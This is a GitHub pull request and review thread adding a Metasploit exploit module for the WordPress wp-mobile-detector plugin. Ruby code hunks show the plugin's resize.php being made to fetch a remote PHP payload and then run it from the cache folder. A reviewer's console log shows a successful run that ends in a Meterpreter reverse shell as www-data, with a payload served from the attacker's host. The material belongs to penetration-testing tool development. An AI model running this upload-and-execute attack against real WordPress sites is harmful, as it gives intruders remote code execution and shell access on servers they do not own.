### PR TITLE
wp-mobile-detector upload and execute

### PR DESCRIPTION
**Pull request by h00die**
This PR adds a file upload and execute exploit for wordpress plugin wp-mobile-detector.  See docs for link to vulnerable module since it is no longer in the wordpress plugins database.  Thanks to Jordan and Flip for bringing this to my attention.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/unix/webapp/wp_mobile_detector_upload_execute`
- [x] `set rhost [ip]`
- [x] `set lhost [ip]`
- [x] `set srvhost [ip]`
- [x] `exploit`
- [x] **Verify** you get a shell
- [x] check docs are accurate

### CODE REVIEW

**Comment by h00die** [comment]
going to rewrite this with cmdstager

File: modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb [hunk 1]
```diff
@@ -0,0 +1,118 @@
...
+    end
+    payload_name = rand_text_alphanumeric(10) + '.php'
+
+    # First check to see if the file is written already, if it is cache wont retrieve it from us
+    res = send_request_cgi(
+      'global' => true,
+      'method'  => 'GET',
+      'uri'     => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/'
+    )
+    if res and !res.body.include?(payload_name)
```
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb]: `&&`

File: modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb [hunk 2]
```diff
@@ -0,0 +1,118 @@
...
+      'method'  => 'GET',
+      'uri'     => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'),
+      'vars_get' => {'src' => payload_full_url}
+    )
+
+   if res && res.code == 200
+      print_good('Sleeping 5 seconds for payload upload')
+      register_files_for_cleanup(payload_name)
+
+      select(nil,nil,nil,5)
```
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb]: Just `sleep`. `Rex.sleep` if you're paranoid.

File: modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb [hunk 3]
```diff
@@ -0,0 +1,118 @@
...
+
+      print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}")
+      send_request_cgi(
+      {
+        'uri'     => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name),
+      })
+      # wait for callback, without this we exit too fast and miss our shell
+      select(nil,nil,nil,2)
```
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb]: https://www.youtube.com/watch?v=R5sQnfHDNRg

**Comment by wvu-r7** [comment]
Please see https://github.com/rapid7/metasploit-framework/commit/3847a6849473c9b60d6d4410d6cdd69526027ed9, @h00die. Happy to explain.

**Comment by wvu-r7** [comment]
```
msf > use exploit/unix/webapp/wp_mobile_detector_upload_execute 
msf exploit(wp_mobile_detector_upload_execute) > set rhost 192.168.0.243
rhost => 192.168.0.243
msf exploit(wp_mobile_detector_upload_execute) > set targeturi /wordpress-4.4.2
targeturi => /wordpress-4.4.2
msf exploit(wp_mobile_detector_upload_execute) > set payload php/meterpreter/reverse_tcp_uuid 
payload => php/meterpreter/reverse_tcp_uuid
msf exploit(wp_mobile_detector_upload_execute) > set lhost 192.168.0.3 
lhost => 192.168.0.3
msf exploit(wp_mobile_detector_upload_execute) > set verbose true
verbose => true
msf exploit(wp_mobile_detector_upload_execute) > run

[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] KKTsPD4fAx.php verified as not written.
[*] Starting Payload Server
[*] Using URL: http://0.0.0.0:8080/KKTsPD4fAx.php
[*] Local IP: http://192.168.0.3:8080/KKTsPD4fAx.php
[*] Uploading payload via /wordpress-4.4.2/wp-content/plugins/wp-mobile-detector/resize.php?src=http://192.168.0.3:8080/KKTsPD4fAx.php
[+] Payload requested on server, sending
[+] Sleeping 5 seconds for payload upload
[*] Executing the payload via /wordpress-4.4.2/wp-content/plugins/wp-mobile-detector/cache/KKTsPD4fAx.php
[*] Sending stage (37543 bytes) to 192.168.0.243
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.243:57981) at 2017-11-01 13:38:38 -0500
[+] Deleted KKTsPD4fAx.php
[*] Server stopped.

meterpreter > getuid 
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : ubuntu
OS          : Linux ubuntu 3.19.0-59-generic #66-Ubuntu SMP Thu May 12 22:35:27 UTC 2016 x86_64
Meterpreter : php/linux
meterpreter > 
```

**Comment by bwatters-r7** [comment]
# Release Notes
This PR adds a file upload and execute exploit for wordpress plugin wp-mobile-detector.

**Pull request merged**